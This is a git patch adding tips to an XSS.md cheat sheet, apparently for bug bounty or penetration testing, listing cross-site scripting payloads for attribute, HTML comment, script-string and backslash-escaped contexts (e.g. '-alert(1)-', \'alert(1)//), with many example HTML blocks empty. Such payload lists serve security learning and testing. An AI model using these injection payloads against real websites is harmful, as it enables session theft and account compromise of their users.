From 203e78791aa3afbf334796f15069c9849439e631 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Mon, 14 Sep 2020 09:27:09 +0700
Subject: [PATCH] XSS [2]
Add 2 tips and add the preview of the source code after inputting the payloads
---
XSS.md | 73 +++++++++++++++++++++++++++++++++++++++++++++++++++++++---
1 file changed, 70 insertions(+), 3 deletions(-)
diff --git a/XSS.md b/XSS.md
index 2f8e976..681fa72 100644
--- a/XSS.md
+++ b/XSS.md
@@ -17,6 +17,11 @@
```
+* After input the payload
+```html
+
+```
+
3. Add --> to escape the payload if input lands in HTML comments.
```html
-->
@@ -27,6 +32,11 @@
```
+* After input the payload
+```html
+ -->
+```
+
4. Add when the input inside or between opening/closing tags, tag can be , and any other HTML tags
```html
@@ -38,10 +48,15 @@
1
```
+* After input the payload
+```html
+">1
+```
+
5. Use when input inside an attribute’s value of an HTML tag but > is filtered
```html
-"onmouseover=alert(1)
-"autofocus onfocus=alert(1)
+" onmouseover=alert(1)
+" autofocus onfocus=alert(1)
```
* Example source code
@@ -49,6 +64,11 @@
```
+* After input the payload
+```html
+
+```
+
6. Use when input inside
@@ -57,7 +77,54 @@
* Example source code
```html
+```
+
+* After input the payload
+```html
+alert(1)';
+
+```
+
+7. Use when input lands in a script block, inside a string delimited value.
+```html
+'-alert(1)-'
+'/alert(1)//
+```
+
+* Example source code
+```html
+
+```
+
+* After input the payload
+```html
+
+```
+
+8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
+```html
+\'alert(1)//
+```
+
+* If we input payload '-alert(1)-' it will be like this
+```html
+
+```
+The quotes are escaped by a backslash so we need to bypass them
+
+* After input the payload
+```html
+
```